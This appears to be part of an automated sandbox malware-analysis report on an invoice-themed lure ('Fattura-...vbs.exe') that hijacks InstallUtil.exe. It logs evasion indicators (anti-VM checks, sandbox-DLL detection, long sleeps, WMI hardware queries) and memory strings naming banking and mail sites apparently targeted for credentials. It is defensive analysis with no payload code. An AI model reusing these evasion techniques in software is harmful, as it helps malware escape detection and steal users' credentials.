Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Fattura-24SC-99245969925904728562.vbs.exe PID: 7764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: OSDescription.vbs.exe PID: 6024, type: MEMORYSTR

Powershell is started from unusual location (likely to bypass HIPS)

Source: c:\users\user\appdata\roaming\osdescription.vbs.exe	Key value queried: Powershell behavior
Source: c:\users\user\desktop\fattura-24sc-99245969925904728562.vbs.exe	Key value queried: Powershell behavior			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005095000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004BC5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Memory allocated: 2F90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Memory allocated: 47D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Memory allocated: 8310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 710000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Memory allocated: 42B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Memory allocated: 42B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Memory allocated: 7F80000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 1540000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2F50000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2D80000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Window / User API: threadDelayed 2695	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Window / User API: threadDelayed 3455	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 2844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 5486	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Window / User API: threadDelayed 4439
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Window / User API: threadDelayed 1330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 3965
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 5802

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe TID: 7916	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -31000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -30850s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -30735s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -30610s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -30485s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -30360s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -30235s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -30112s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -37000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -36891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -36766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -36657s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -36532s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -36407s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -36297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -36176s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -35963s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -35859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -35485s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -35299s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -35172s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -35047s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -34938s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -34813s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -34703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -34593s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -34485s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -34375s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036	Thread sleep time: -34266s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7948	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe TID: 2120	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692	Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692	Thread sleep time: -32000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692	Thread sleep time: -31890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692	Thread sleep time: -31781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692	Thread sleep time: -31671s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692	Thread sleep time: -31562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692	Thread sleep time: -31450s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692	Thread sleep time: -31331s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692	Thread sleep time: -31216s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692	Thread sleep time: -31107s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692	Thread sleep time: -30982s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692	Thread sleep time: -30859s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692	Thread sleep time: -30734s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692	Thread sleep time: -30625s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692	Thread sleep time: -30515s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692	Thread sleep time: -30406s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692	Thread sleep time: -30297s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692	Thread sleep time: -30187s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692	Thread sleep time: -30078s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 31000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30850	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30112	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 37000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36657	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36407	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36176	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35963	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35299	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 34938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 34813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 34703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 34593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 34485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 34375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 34266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 32000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 31890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 31781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 31671
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 31562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 31450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 31331
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 31216
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 31107
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30982
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30515
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30406
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30297
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30187
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30078

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior

Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: InstallUtil.exe, 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmGuestLib.dllDselect * from Win32_ComputerSystem
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: InstallUtil.exe, 00000009.00000002.1450013749.000000000082F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: InstallUtil.exe, 00000011.00000002.1613446812.0000000001281000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 0VMware\|VIRTUAL\|A M I\|Xen4win32_process.handle='{0}'
Source: OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
